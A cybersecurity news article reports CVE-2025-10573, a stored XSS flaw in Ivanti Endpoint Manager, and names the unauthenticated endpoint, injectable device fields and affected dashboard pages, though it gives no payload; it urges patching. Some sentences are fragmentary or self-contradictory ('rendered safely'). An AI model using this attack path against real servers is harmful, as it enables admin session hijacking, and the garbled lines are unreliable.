Critical Ivanti EPM Vulnerability Allows Admin Session Hijacking via Stored XSS

Critical Ivanti EPM Vulnerability Allows Admin Session Hijacking via Stored XSS

Posted on By CWS

A critical stored cross-site scripting vulnerability in Ivanti Endpoint Manager (“EPM”) versions 2024 SU4 and below, that could enable attackers to hijack administrator sessions without authentication.

The vulnerability, identified as CVE-2025-10573, has been assigned a CVSS score of 9.6 and patched on December 9, 2025, with the release of Ivanti EPM version 2024 SU4 SR1.

An attacker with unauthenticated access to the primary EPM web service can join fake managed endpoints to the EPM server. Poisoning the administrator’s web dashboard with malicious JavaScript.

When an Ivanti EPM administrator views the contaminated dashboard during normal operations.

AttributeDetailsCVE IDCVE-2025-10573Vulnerability TypeStored Cross-Site Scripting (XSS)CVSS Score9.6Affected ProductIvanti Endpoint Manager (EPM)Affected VersionsEPM 2024 SU4 and below

The passive user interaction triggers client-side JavaScript execution, granting the attacker complete control of the administrator’s session.

The vulnerability stems from the ‘incomingdata’ web API, which processes device scan data without proper input validation.

Attackers can submit malicious payloads through this unauthenticated endpoint. These are then stored in the device database and rendered safely in the administrator dashboard interface.

An unauthenticated attacker can craft a POST request to the ‘/incomingdata/postcgi.exe’ endpoint. It contains XSS payloads embedded in device scan fields such as Device ID, Display Name, or OS Name.

These payloads are automatically processed and added to the device database without sanitization. When administrators access web dashboard pages displaying device information.

Including ‘frameset.aspx’ and ‘db_frameset.aspx’, the malicious scripts execute in their browsers.

Ivanti EPM is a widely deployed endpoint management software used by organizations for remote administration, vulnerability scanning, and compliance management.

Successful exploitation enables attackers to remotely control endpoints and install unauthorized software, making this vulnerability particularly dangerous.

According to Rapid7, Organizations should immediately upgrade to Ivanti EPM version 2024 SU4 SR1. Because this vulnerability is unauthenticated, patching affected instances as soon as possible is critical.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Contact us to feature your stories.

Cyber Security News Tags:, , , , , , , ,

Related Posts

Evasive Panda APT Using AitM Attack and DNS Poisoning to Deliver Malware Evasive Panda APT Using AitM Attack and DNS Poisoning to Deliver Malware Cyber Security News
SmartApeSG Campaign Leverages ClickFix Technique to Deploy NetSupport RAT SmartApeSG Campaign Leverages ClickFix Technique to Deploy NetSupport RAT Cyber Security News
First-Ever Malicious MCP Server Found in the Wild Steals Emails via AI Agents First-Ever Malicious MCP Server Found in the Wild Steals Emails via AI Agents Cyber Security News
New Attack Technique That Enables Attackers To Exfiltrate Git Credentials In Argocd New Attack Technique That Enables Attackers To Exfiltrate Git Credentials In Argocd Cyber Security News
Lenovo Vantage Vulnerabilities Allow Attackers to Escalate Privileges as SYSTEM User Lenovo Vantage Vulnerabilities Allow Attackers to Escalate Privileges as SYSTEM User Cyber Security News
Microsoft To Depreciate VBScript In Windows Warns Developers To Adapt Their Projects Microsoft To Depreciate VBScript In Windows Warns Developers To Adapt Their Projects Cyber Security News